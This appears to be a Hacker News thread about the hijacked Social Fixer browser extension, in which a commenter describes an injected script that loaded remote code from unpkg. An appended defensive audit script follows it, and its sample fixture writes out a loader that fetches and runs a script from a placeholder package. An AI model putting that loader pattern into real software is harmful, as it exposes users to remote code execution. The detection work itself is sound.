
Social Fixer extension hacked (192k users affected) - joshschreuder
https://www.facebook.com/socialfixer/posts/10155109803749342
======
joshschreuder
It looks like a script was added (insertion.js) that inserts a script from
[https://unpkg.com](https://unpkg.com).

[https://pastebin.com/q9xT21Xr](https://pastebin.com/q9xT21Xr)

The script seems to be blacklisted currently, but the new code has a changing
hash based on time since install which I think allows the hack to continue
working after it has been blacklisted.

I am hoping I am safe as uBlock caught the script before it could be executed
due to it coming from a 3rd party domain.

[https://i.imgur.com/0lck7mG.png](https://i.imgur.com/0lck7mG.png)

~~~
joshschreuder
Well done to unpkg for being quick to block the malicious packages:

[https://github.com/unpkg/unpkg.com/commit/ac09a03c75a51997b9...](https://github.com/unpkg/unpkg.com/commit/ac09a03c75a51997b909a63546f9773ca9aeb837)
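
An added example, not part of the thread or of the extension's code: a static check over an unpacked extension's JavaScript that reports remote URLs and raises the severity when the same file also contains a script-loading pattern, as described for insertion.js above. The function name, the sample file contents, the placeholder package name and the allowlisted host are all constructed for illustration.

```javascript
// Heuristic audit: find remote URLs in extension source and rate them by
// whether the file also contains code that loads a script at runtime.
const URL_RE = /https?:\/\/([a-z0-9.-]+)(\/[^\s'"`)]*)?/gi;
// Patterns that turn a URL into executing code (heuristic; ".src =" also
// matches images, so a "high" finding still needs a manual look).
const LOADER_RE = /createElement\(\s*['"`]script['"`]\s*\)|importScripts\s*\(|\.src\s*=/i;

// files: { fileName: sourceText }; allowedHosts: hosts the extension is expected to contact.
function findRemoteScriptLoads(files, allowedHosts = []) {
  const allowed = new Set(allowedHosts.map((h) => h.toLowerCase()));
  const findings = [];
  for (const [name, source] of Object.entries(files)) {
    const loadsScripts = LOADER_RE.test(source);
    for (const m of source.matchAll(URL_RE)) {
      const host = m[1].toLowerCase();
      if (allowed.has(host)) continue; // expected host, skip
      findings.push({
        file: name,
        host,
        url: m[0],
        severity: loadsScripts ? "high" : "info",
      });
    }
  }
  return findings;
}

// Constructed sample input (not the real extension files).
const SAMPLE_FILES = {
  "insertion.js": [
    "var s = document.createElement('script');",
    "s.src = 'https://unpkg.com/placeholder-package@0.0.0/index.js';",
    "document.head.appendChild(s);",
  ].join("\n"),
  "options.js": "var help = 'https://docs.example.org/help'; // link text only",
};

console.log(findRemoteScriptLoads(SAMPLE_FILES, ["docs.example.org"]));
```

Because the check keys on the host and the loading pattern rather than on one exact package URL, a change to the URL path alone does not hide the finding.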

